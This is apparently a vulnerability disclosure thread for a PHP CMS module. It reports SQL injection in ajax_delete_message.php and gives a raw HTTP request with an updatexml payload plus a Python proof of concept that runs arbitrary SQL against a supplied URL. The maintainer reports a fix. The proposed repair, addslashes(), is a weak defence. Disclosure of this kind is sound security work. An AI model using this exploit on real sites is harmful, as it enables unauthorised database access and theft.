SQL injection In modules/miniform/ajax_delete_message.php multiple post parameter combinations exist error injection

[wanan0red]

SQL injection In modules/miniform/ajax_delete_message.php multiple post parameter combinations exist error injection

request packet

POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: stu
Content-Length: 170
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://stu
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://stu/modules/miniform/ajax_delete_message.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

DB_RECORD_TABLE=droplets&purpose=delete_record&action=delete&DB_COLUMN=id%60+%3D+-1+or+updatexml%281%2Cconcat%28%27%24%27%2C%28database%28%29%29%29%2C0%29%23&iRecordID=-1

poc

import requests

url = input("Enter url:")
url = url+"/modules/miniform/ajax_delete_message.php"
pay = input("Enter the sql statement you want to execute:")
data={
"DB_RECORD_TABLE":"droplets",
    "purpose":"delete_record",
    "action":"delete",
    "DB_COLUMN":f"id` = -1 or updatexml(1,concat('$',({pay})),0)#",
    "iRecordID":"-1"
}
res = requests.post(url,data=data)
print(res.text)

Repair plan

add addslashes()

[instantflorian]

Thank you for reporting the issue. Fix applied in 4234fd773c016775696e3bd8978e0627ebfd1415

[Forshock]

Similar unsanitized input exists within ajax_load_more.php of same module

Lines 19-21 (Still need to learn Git, so bare with me)

[instantflorian]

Can't confirm. Just in the lines before is an authentication check.